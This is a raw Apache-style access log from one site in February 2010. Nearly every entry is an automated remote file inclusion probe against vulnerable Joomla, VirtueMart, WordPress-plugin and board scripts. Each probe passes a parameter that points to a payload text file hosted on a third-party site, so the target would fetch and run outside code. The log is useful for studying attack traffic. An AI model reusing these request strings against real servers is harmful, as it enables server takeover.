69.64.70.246 - - [19/Feb/2010:06:23:32 -0800] "GET /logs/access_100118.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:06:23:33 -0800] "GET /logs/access_100129.log//includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:23:40 -0800] "GET /logs/access_100120.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.221.175.32 - - [19/Feb/2010:06:23:50 -0800] "GET /logs/access_100121.log//includes/ktedit/toolbar.php?dirDepth=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:24:01 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:24:01 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:24:01 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:24:03 -0800] "GET /logs/access_100114.log%20%20/lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:24:09 -0800] "GET /logs/access_100114.log%20%20/lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:24:09 -0800] "GET /logs/access_100114.log%20%20/lostpasswd.php?env[include_prefix]=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:24:11 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:24:11 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:24:11 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:24:18 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.55.36.222 - - [19/Feb/2010:06:24:19 -0800] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.55.36.222 - - [19/Feb/2010:06:24:19 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.55.36.222 - - [19/Feb/2010:06:24:19 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:06:24:21 -0800] "GET /logs/access_100202.log//bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:06:24:28 -0800] "GET /bbs///////delete_comment.php?board_skin=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:06:24:28 -0800] "GET /logs/access_100109.log//bbs///////delete_comment.php?board_skin=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:06:24:28 -0800] "GET /logs//bbs///////delete_comment.php?board_skin=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.91.240.2 - - [19/Feb/2010:06:24:31 -0800] "GET /logs/access_100114.log%20%20//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:06:24:32 -0800] "GET /logs/access_100130.log//bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.191.221.86 - - [19/Feb/2010:06:24:47 -0800] "GET /logs/access_100205.log//bbs///////delete_comment.php?board_skin=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:24:56 -0800] "GET /logs/access_100120.log%20%20//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:25:09 -0800] "GET /ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:25:09 -0800] "GET /logs/access_100129.log//ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:25:09 -0800] "GET /logs//ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:25:22 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:25:22 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:25:30 -0800] "GET /logs/access_100127.log//ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:25:31 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:25:42 -0800] "GET /logs/access_100210.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:25:42 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:25:42 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:26:01 -0800] "GET /logs/access_100115.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:26:18 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:26:23 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:26:36 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:26:36 -0800] "GET /logs/access_100210.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:26:36 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:26:39 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:26:39 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:26:39 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:26:44 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:26:53 -0800] "GET /logs/access_100115.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:26:58 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:26:58 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.55.36.222 - - [19/Feb/2010:06:27:34 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:27:44 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:27:44 -0800] "GET /logs/access_100210.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:27:45 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:27:45 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:27:45 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [19/Feb/2010:06:27:45 -0800] "GET /logs/access_100210.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zonn.t35.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:27:47 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:27:53 -0800] "GET /logs/access_100203.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:27:53 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:27:53 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:01 -0800] "GET /logs/access_100126.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.55.36.222 - - [19/Feb/2010:06:28:09 -0800] "GET /logs/access_100206.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:11 -0800] "GET /logs/access_100208.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:13 -0800] "GET /logs//ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:13 -0800] "GET /logs/access_100127.log//ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:13 -0800] "GET /ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:17 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:17 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:23 -0800] "GET /logs/access_100118.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:24 -0800] "GET /logs/access_100203.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:24 -0800] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:24 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:28:40 -0800] "GET /logs/access_100208.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:28:47 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:29:02 -0800] "GET /logs/access_100104.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:29:19 -0800] "GET /logs/access_100126.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.202.102.218 - - [19/Feb/2010:06:30:33 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://foto-wydarzenia.pila.pl/koncerty/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.55.36.222 - - [19/Feb/2010:06:30:55 -0800] "GET /logs/access_100118.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://hajarmani.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [19/Feb/2010:06:31:11 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [19/Feb/2010:06:31:11 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [19/Feb/2010:06:31:12 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [19/Feb/2010:06:31:23 -0800] "GET /logs/access_100114.log%20%20//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:06:31:29 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:06:31:30 -0800] "GET /logs/access.log//bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:31:32 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:31:32 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:06:31:33 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.222.4.82 - - [19/Feb/2010:06:31:47 -0800] "GET /robots.txt HTTP/1.0" 200 36 "http://www.puaga.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
74.222.4.82 - - [19/Feb/2010:06:31:47 -0800] "GET / HTTP/1.0" 200 3626 "http://www.puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
74.222.4.82 - - [19/Feb/2010:06:31:53 -0800] "GET /robots.txt HTTP/1.0" 200 36 "http://www.puaga.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
74.222.4.82 - - [19/Feb/2010:06:31:53 -0800] "GET /style/imagehover.js HTTP/1.0" 200 1410 "http://www.puaga.com/style/imagehover.js" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:06:32:11 -0800] "GET /logs/access_100119.log//bbs///////write_update?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [19/Feb/2010:06:32:25 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [19/Feb/2010:06:32:26 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [19/Feb/2010:06:32:26 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [19/Feb/2010:06:32:37 -0800] "GET /logs/access_100114.log%20%20//index.php?DOCUMENT_ROOT=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:06:33:54 -0800] "GET /logs/access_100117.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:06:33:54 -0800] "GET /bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:06:33:55 -0800] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:35:00 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:35:00 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:35:00 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:06:35:20 -0800] "GET /logs/access_100130.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [19/Feb/2010:06:35:20 -0800] "GET /logs/access_100202.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:35:30 -0800] "GET /logs/access_100130.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:35:52 -0800] "GET /logs/access_100121.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:35:52 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:35:52 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:06:37:01 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:06:37:02 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:06:37:02 -0800] "GET /logs/access_100204.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
69.13.69.245 - - [19/Feb/2010:06:37:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/id.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
